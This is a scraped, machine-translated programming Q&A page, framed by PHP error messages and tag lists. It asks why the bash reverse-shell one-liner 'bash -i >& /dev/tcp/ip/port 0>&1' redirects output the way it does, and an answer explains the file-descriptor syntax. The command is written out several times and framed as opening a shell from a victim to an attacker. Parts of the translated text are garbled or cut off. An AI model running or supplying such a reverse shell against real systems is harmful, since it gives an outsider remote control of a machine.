Linux Bash反向shell奇怪的行为_Linux_Bash_Shell_Reverse Shell - Fatal编程技术网

Warning: file_get_contents(/data/phpspider/zhask/data//catemap/5/bash/17.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181

Warning: file_get_contents(/data/phpspider/zhask/data//catemap/0/hadoop/6.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Linux Bash反向shell奇怪的行为_Linux_Bash_Shell_Reverse Shell - Fatal编程技术网

Linux Bash反向shell奇怪的行为

linux bash shell

Linux Bash反向shell奇怪的行为,linux,bash,shell,reverse-shell,Linux,Bash,Shell,Reverse Shell,我今天试着尽可能多地理解一个命令（找到的），在受害者一侧打开一个反向外壳。这是： bash-i>&/dev/tcp/ip/port 0>&1 但是，我没有完全理解为什么第一个重定向是&。我知道/dev/tcp/ip/port是由bash创建的“伪”文件，但我没有找到是否必须将其视为真实文件或文件描述符的信息。因此，我试图将其视为一个真实的文件，并像这样重写bash命令： bash-i>/dev/tcp/ip/port 0>&1 在本例中，出现了一个奇怪的行为：反向shell按预期工作（我可以

我今天试着尽可能多地理解一个命令（找到的），在受害者一侧打开一个反向外壳。这是：

bash-i>&/dev/tcp/ip/port 0>&1

但是，我没有完全理解为什么第一个重定向是

。我知道

/dev/tcp/ip/port

是由bash创建的“伪”文件，但我没有找到是否必须将其视为真实文件或文件描述符的信息。因此，我试图将其视为一个真实的文件，并像这样重写bash命令：

bash-i>/dev/tcp/ip/port 0>&1

在本例中，出现了一个奇怪的行为：反向shell按预期工作（我可以在攻击者端键入一些命令，并在攻击者端获得输出），除了一个输出：bash命令提示符文本。因此，唯一没有在攻击者一侧打印，但在受害者一侧打印的内容是：

bash-4.4$

其他内容按预期打印，即在攻击者一侧

我尝试的最后一个测试是更改bash命令，如下所示：

bash-i>/dev/tcp/ip/port
bash
中的文件描述符是一个数字，即。E一个或多个数字，因此/dev/..
绝对不是文件描述符。您被特殊构造&
误导了，除非后面跟一个数字，否则它不是复制输出文件描述符的重定向运算符，而是复制输出文件描述符的非传递格式

为什么作者使用0>&1
来更改stdin而不是使用了“0>&1”和“关于shell提示符，据我所知，它被重定向到与终端会话相关联的/dev/tty，而不是stdin、stdout或stderr，但它可能在unix版本中有所不同很好，这解释了一切！非常感谢：）




[bash]相关文章推荐



                                                        
                                       





随机文章推荐


                                        

                                        
                                        


                                                
                                                        [linux]相关推荐
                                                        
Linux 约250000张图像的最佳web文件夹结构
									Linux
							 									Apache
							 									Image
							 
Linux 什么是抢占/什么是可抢占内核？它有什么好处？
									Linux
							 									Operating System
							 									Kernel
							 
Linux 如何从命令行在GNOME终端中打开新选项卡？
									Linux
							 									Ubuntu
							 									Terminal
							 
理解Linux/proc/id/maps
									Linux
							 									Embedded
							 
Linux 如何在Fedora 10中将.rpm文件转换为.deb文件
									Linux
							 									Ubuntu
							 
Linux 终端：在窗口中打开当前路径？
									Linux
							 									User Interface
							 									Ubuntu
							 									Directory
							 									Terminal
							 
Linux 使用.htaccess重定向403错误
									Linux
							 									.htaccess
							 
在Linux中运行web服务器的个人实例
									Linux
							 									Web Applications
							 
Linux 最小内核转储（仅限堆栈跟踪和当前帧）
									Linux
							 									Gcc
							 									Gdb
							 
Linux 递归make递归太多，需要一个伪前提条件
									Linux
							 									Makefile
							 
Linux 如何在bash中确定空白DVD上的可用存储空间量？
									Linux
							 									Bash
							 
Linux diff命令忽略新目录中的新文件
									Linux
							 									Bash
							 									Shell
							 									Linux Kernel
							 
Linux 如何抑制GNU倍频程中的警告
									Linux
							 									Octave
							 
Linux 像select（）或poll（）这样的系统调用是如何工作的？
									Linux
							 									Sockets
							 									Asynchronous
							 									Io
							 
Linux cron没有运行程序
									Linux
							 									Cron
							 
如何在Linux内核中实现percpu指针？
									Linux
							 									Linux Kernel
							 
Linux 将cat输出保存到变量中时，所有换行符都将被删除
									Linux
							 									Bash
							 									Shell
							 
为什么我的LinuxBash中的这个简单FOR循环不起作用？
									Linux
							 									Bash
							 									Shell
							 									Unix
							 
Linux 如何在NFS上使用扩展文件属性？
									Linux
							 
Linux：基于另一个模块加载模块
									Linux
							 									Linux Kernel
							 
Linux 使用netcat的ssh代理命令
									Linux
							 									Encryption
							 									Ssh
							 
在linux中下载文件之前，如何知道文件的总大小
									Linux
							 									Ftp
							 
Linux 重定向docker中的命令输出
									Linux
							 									Bash
							 									Logging
							 									Docker
							 
Linux 目录中的子目录数？
									Linux
							 									Hadoop
							 									Apache Spark
							 
Linux 错误：服务“；xxx“；使用未定义的网络“；xxx“；
									Linux
							 									Docker
							 									Docker Compose
							 
Linux 如何使用GCP负载平衡器将HTTP重定向到HTTPS
									Linux
							 									Apache
							 									Google Cloud Platform
							 
Linux 为什么我的/proc/kallsyms文件不包含System.map中的所有符号？
									Linux
							 									Linux Kernel
							 
Linux Curl命令设置权限并下载文件
									Linux
							 									Curl
							 
Linux 用于筛选用户的脚本
									Linux
							 									Bash
							 									Shell
							 
Linux vs代码终端在单击鼠标时始终具有换行符
									Linux
							 									Visual Studio Code
							 
                                                        
                                                

                                                
                                                        Tags
                                                        
Teradata
Java 8
Multithreading
Umbraco
Language Agnostic
Plugins
Mule
Dynamic
Validation
Xamarin
Ip
Entity Framework Core
Active Directory
Angular6
Nunit
Asp.net Mvc 4
Gitlab
Google Maps
Unity3d
Webrtc
Content Management System
Cordova
Matlab
Jira
Telerik
Deep Learning
Geometry
Android Studio
Perforce
Report
Localization
Internet Explorer
Webstorm
Certificate
Meteor
Gruntjs
Scrapy
Solr
Kentico
Erlang
Adobe
Cmake
Pip
Cakephp
Artifactory
Gradle
C#
Keras
Neo4j
Twitter Bootstrap
Vaadin
Sql Server 2008
Artificial Intelligence
Matplotlib
Security
Sequelize.js
Serial Port
Version Control
Aem
Google Cloud Dataflow
Aws Lambda
Winapi
Jsp
Tags
Generics
Webpack
Visual Studio
Puppet
Hyperledger Fabric
Nsis
Extjs
Cygwin
Drools
Wicket
Delphi
Nestjs
Charts
Xmpp
Clojure
Loopbackjs
Http
Sublimetext3
Domain Driven Design
Eclipse Plugin
Mono
Jdbc
.net
Spring
Geolocation
Passwords
Parse Platform
Design Patterns
Smalltalk
Oracle11g
Makefile
Google Visualization
Socket.io
C++
Forms
Single Sign On
Swing
Binding
Flask
Computer Vision
Postman
Join
Servlets
Junit
Encryption
Lisp
Electron
Netty
Titanium
Flash
Ubuntu
Xcode
Uml
Firebase
Cron
Deployment
Ms Word
Jwt
Installation
Stored Procedures
Ldap
Ember.js
Codeigniter
Mongoose
Graphviz
User Interface
Openshift
Selenium
Javafx
Data Binding
Openerp
Usb
Nginx
Struct
Twilio
Neural Network
Windows Mobile
Plsql
Uitableview
Wix
Uiview
Docker
Gatsby
Twig
Blackberry
Autodesk Forge
Powerbi
Playframework 2.0
Ftp
Testing
Qt
Calendar
Path
Spring Boot
Architecture
Weblogic
Appium
Bots
Ffmpeg
Perl
Heroku
R
Gnuplot
Svg
Sbt
Object
Knockout.js
Ignite
React Native
Objective C
Apache Zookeeper
Sonarqube
Google App Engine
Express
Powershell
Sip
Ios6
Latex
Autocomplete
Apache Spark
Vue.js
Glassfish
Phpstorm
Linux Kernel
Identityserver4
Jestjs
Ocaml
For Loop
Macos
Oauth
Unicode
Nativescript
Vim
Jakarta Ee
Android Fragments
Logging
Google Analytics


                

                        
						
                        
                                
                                        
                                                
                                                        
                                                                Copyright © 2024. All Rights Reserved by  - Fatal编程技术网